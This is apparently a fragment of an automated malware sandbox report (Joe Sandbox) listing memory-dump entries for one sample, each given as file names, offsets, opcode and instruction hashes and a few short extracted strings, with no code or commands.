                                              • Source File: 00000017.00000002.3692676756.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_23_2_e40000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6c47d090bef5a7565effd6637c7c22b914bea32df345d59a5b8a0a3e5f0799a0
                                              • Instruction ID: ce2391ce7f1c5acbfbecce67dabe89df7a0a1e00f9b6b5ee994268baec32ca42
                                              • Opcode Fuzzy Hash: 6c47d090bef5a7565effd6637c7c22b914bea32df345d59a5b8a0a3e5f0799a0
                                              • Instruction Fuzzy Hash: FED0173AB000089FCB008F88E8408DDB7B6FB8C221B008016F915E3220C6319821CB90
                                              Memory Dump Source
                                              • Source File: 00000017.00000002.3692676756.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_23_2_e40000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 976bb20ed19c7f24a4fce8ea7f68f7b813a2931b72af3458855f89b7b22c5221
                                              • Instruction ID: f35a0ff346729460eece8124e5c638c422463b06b4f7c2aeafefa094e27b01ad
                                              • Opcode Fuzzy Hash: 976bb20ed19c7f24a4fce8ea7f68f7b813a2931b72af3458855f89b7b22c5221
                                              • Instruction Fuzzy Hash: 1BC0123552034B57D615F771E985559336AA6C0610F408611B1090D619EF7C594657A2
                                              Memory Dump Source
                                              • Source File: 00000017.00000002.3701679878.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_23_2_64e0000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f2f31da5c28e73c506eca0c00e5b6afca06bea95f9a2bdde005ef4f2c112c005
                                              • Instruction ID: 4bf70237ad45723ee8c2dc95a1a875cfd97a704c09edf58ac6e9bda779fc73c2
                                              • Opcode Fuzzy Hash: f2f31da5c28e73c506eca0c00e5b6afca06bea95f9a2bdde005ef4f2c112c005
                                              • Instruction Fuzzy Hash: E1C08C608042028ACF319F5099F4A0D3A20FB81302F2200E7C8018A0A6E1200284DA41
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000017.00000002.3701679878.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_23_2_64e0000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: "$0oEp$LjEp$LjEp$LjEp$LjEp$LjEp$LjEp$LjEp$LjEp$PHq$PHq$PHq$PHq$PHq$PHq$PHq$PHq
                                              • API String ID: 0-3075396612
                                              • Opcode ID: df08683557e14dd06cb9aa102265a075869c8cb592ae3a9873abffd003ab0f7a
                                              • Instruction ID: c8101d7cdc32672fa42c18b7777aa82dd40727773779d7e3c8f5a80b6f51e8df
                                              • Opcode Fuzzy Hash: df08683557e14dd06cb9aa102265a075869c8cb592ae3a9873abffd003ab0f7a
                                              • Instruction Fuzzy Hash: 18329074E00218CFEB64DF65D984B9DBBB2BF89301F1081AAD809AB365DB755E85CF10
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000017.00000002.3701679878.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_23_2_64e0000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: "$0oEp$PHq$PHq$PHq$PHq$PHq$PHq$PHq$PHq
                                              • API String ID: 0-659101215
                                              • Opcode ID: 3a993cff25873e2be0abb4774dbcff3ab351632247d24d4d456ac202d7483465
                                              • Instruction ID: 8ac972bd3ef10a26402fbfda4f58a377ec43e3e160e434ecd18b7a237e82bab8
                                              • Opcode Fuzzy Hash: 3a993cff25873e2be0abb4774dbcff3ab351632247d24d4d456ac202d7483465
                                              • Instruction Fuzzy Hash: 7202A074E002188FDB64DF65D984B9DBBF2BF89300F1081A9D819AB365DB755E85CF10
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000017.00000002.3692676756.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_23_2_e40000_EDyxAgkldisLe.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \;q$\;q$\;q$\;q
                                              • API String ID: 0-2933265366
                                              • Opcode ID: 5a8b6611be52971af0fcb71245bd7b79fee733490a160d8dc94765f4137bd3f6
                                              • Instruction ID: ee55ee72e8fd6449faef13183ab677838aaaa237d7bbf4e8deadc20d407c04e8
                                              • Opcode Fuzzy Hash: 5a8b6611be52971af0fcb71245bd7b79fee733490a160d8dc94765f4137bd3f6
                                              • Instruction Fuzzy Hash: 9901A7317001258FCB348E2DE444A6673E6BFDA7A8729527AE502DB3B4DA71DC428752